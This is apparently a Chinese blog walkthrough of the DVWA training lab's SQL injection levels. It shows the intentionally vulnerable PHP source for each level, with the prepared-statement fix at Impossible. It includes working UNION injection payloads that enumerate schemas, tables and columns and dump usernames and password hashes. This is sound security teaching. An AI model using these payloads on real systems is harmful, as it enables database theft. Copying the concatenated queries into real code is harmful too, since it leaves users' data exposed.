DVWA靶场-sql注入(sqlInjection)

第七关:SQL Injection

      SQL注入,是指攻击者通过注入恶意的SQL命令,破坏SQL查询语句的结构,从而达到执行恶意SQL语句的目的。SQL注入漏洞的危害是巨大的,常常会导致整个数据库被“脱裤”,尽管如此,SQL注入仍是现在最常见的Web漏洞之一。

Low

<?php
if( isset( $_REQUEST[ 'Submit' ] ) ) {
    
    
    // Get input
    $id = $_REQUEST[ 'id' ];
    switch ($_DVWA['SQLI_DB']) {
    
    
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
    
    
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
            }
            mysqli_close($GLOBALS["___mysqli_ston"]);
            break;
        case SQLITE:
            global $sqlite_db_connection;
            #$sqlite_db_connection = new SQLite3($_DVWA['SQLITE_DB']);
            #$sqlite_db_connection->enableExceptions(true);
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
            #print $query;
            try {
    
    
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
    
    
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }
            if ($results) {
    
    
                while ($row = $results->fetchArray()) {
    
    
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];
                    // Feedback for end user
                    echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
                }
            } else {
    
    
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    } 
}
?>

      对源码分析得,注入点是id,并且是字符型注入,服务端接收id参数,没有做任何处理,并且有回显,和报错详情,可以使用联合查询和报错注入以及时间盲注来实现手工注入。
      加'页面报错
在这里插入图片描述

利用order by判断字段数
在这里插入图片描述
在这里插入图片描述

使用union判断回显位置

在这里插入图片描述

使用联合注入爆出数据库的库名和版本
在这里插入图片描述

爆出数据库中所有得库名:id=-1' union select 1,group_concat(schema_name) from information_schema.schemata#
在这里插入图片描述

爆出当前数据库所有的表名:id=-1' union select 1,group_concat(table_name) from information_schema.tables where table_schema="dvwa"#
在这里插入图片描述

爆出当前表中所有的字段名:id=-1' union select 1,group_concat(column_name) from information_schema.columns where table_name="users" and table_schema="dvwa"#
在这里插入图片描述

查询表中的数据
在这里插入图片描述

Medium

<?php
if( isset( $_POST[ 'Submit' ] ) ) {
    
    
    // Get input
    $id = $_POST[ 'id' ];
    $id = mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $id);
    switch ($_DVWA['SQLI_DB']) {
    
    
        case MYSQL:
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query) or die( '<pre>' . mysqli_error($GLOBALS["___mysqli_ston"]) . '</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
    
    
                // Display values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
            }
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = $id;";
            #print $query;
            try {
    
    
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
    
    
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }
            if ($results) {
    
    
                while ($row = $results->fetchArray()) {
    
    
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
                }
            } else {
    
    
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}
// This is used later on in the index.php page
// Setting it here so we can close the database connection in here like in the rest of the source scripts
$query  = "SELECT COUNT(*) FROM users;";
$result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
$number_of_rows = mysqli_fetch_row( $result )[0];
mysqli_close($GLOBALS["___mysqli_ston"]);
?>

代码中使用了mysql_real_escape_string函数对特殊符号进行转义,页面中也使用下拉框来避免用户的输入,且使用POST进行数据提交
虽然使用了POST进行数据提交,但是可以使用burp suite抓包获取参数信息,利用google插件hackbar进行数据提交,首先判断注入类型,之后判断字段数,后面的步骤与low中类似。
在这里插入图片描述

High

<?php
if( isset( $_SESSION [ 'id' ] ) ) {
    
    
    // Get input
    $id = $_SESSION[ 'id' ];

    switch ($_DVWA['SQLI_DB']) {
    
    
        case MYSQL:
            // Check database
            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>Something went wrong.</pre>' );

            // Get results
            while( $row = mysqli_fetch_assoc( $result ) ) {
    
    
                // Get values
                $first = $row["first_name"];
                $last  = $row["last_name"];

                // Feedback for end user
                echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
            }

            ((is_null($___mysqli_res = mysqli_close($GLOBALS["___mysqli_ston"]))) ? false : $___mysqli_res);        
            break;
        case SQLITE:
            global $sqlite_db_connection;

            $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id' LIMIT 1;";
            #print $query;
            try {
    
    
                $results = $sqlite_db_connection->query($query);
            } catch (Exception $e) {
    
    
                echo 'Caught exception: ' . $e->getMessage();
                exit();
            }

            if ($results) {
    
    
                while ($row = $results->fetchArray()) {
    
    
                    // Get values
                    $first = $row["first_name"];
                    $last  = $row["last_name"];

                    // Feedback for end user
                    echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
                }
            } else {
    
    
                echo "Error in fetch ".$sqlite_db->lastErrorMsg();
            }
            break;
    }
}
?>

从源码中可以看出,High级别的代码只是在sql查询语句中添加了limit限制,以此防止多条数据显示。但是我们可以使用#进行注释,所以手工注入的过程与low中的类似。
在进行手工注入时,根据代码使用的payload为1' union select 1,2;#,需要添加分号。
由于手工注入与low代码类似,所以使用1' union select group_concat(user_id,first_name),group_concat(password) from users;#显示结果
在这里插入图片描述

需要特别提到的是,High级别的查询提交页面与查询结果显示页面不是同一个,也没有执行302跳转,此做法目的是为了防止sqlmap注入,因为sqlmap在注入过程中,无法在查询提交页面上获取查询的结果,没有了反馈,就没办法进行注入。

Impossible

<?php
if( isset( $_GET[ 'Submit' ] ) ) {
    
    
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $id = $_GET[ 'id' ];

    // Was a number entered?
    if(is_numeric( $id )) {
    
    
        $id = intval ($id);
        switch ($_DVWA['SQLI_DB']) {
    
    
            case MYSQL:
                // Check the database
                $data = $db->prepare( 'SELECT first_name, last_name FROM users WHERE user_id = (:id) LIMIT 1;' );
                $data->bindParam( ':id', $id, PDO::PARAM_INT );
                $data->execute();
                $row = $data->fetch();

                // Make sure only 1 result is returned
                if( $data->rowCount() == 1 ) {
    
    
                    // Get values
                    $first = $row[ 'first_name' ];
                    $last  = $row[ 'last_name' ];

                    // Feedback for end user
                    echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
                }
                break;
            case SQLITE:
                global $sqlite_db_connection;

                $stmt = $sqlite_db_connection->prepare('SELECT first_name, last_name FROM users WHERE user_id = :id LIMIT 1;' );
                $stmt->bindValue(':id',$id,SQLITE3_INTEGER);
                $result = $stmt->execute();
                $result->finalize();
                if ($result !== false) {
    
    
                    // There is no way to get the number of rows returned
                    // This checks the number of columns (not rows) just
                    // as a precaution, but it won't stop someone dumping
                    // multiple rows and viewing them one at a time.

                    $num_columns = $result->numColumns();
                    if ($num_columns == 2) {
    
    
                        $row = $result->fetchArray();

                        // Get values
                        $first = $row[ 'first_name' ];
                        $last  = $row[ 'last_name' ];

                        // Feedback for end user
                        echo "<pre>ID: {
      
      $id}<br />First name: {
      
      $first}<br />Surname: {
      
      $last}</pre>";
                    }
                }

                break;
        }
    }
}
// Generate Anti-CSRF token
generateSessionToken();
?>

Impossible级别的代码采用了PDO技术,划清了代码与数据的界限,有效防御SQL注入,同时只有返回的查询结果数量为一时,才会成功输出,这样就有效预防了“脱裤”,Anti-CSRFtoken机制的加入了进一步提高了安全性。

猜你喜欢

转载自blog.csdn.net/qq_43707926/article/details/123404671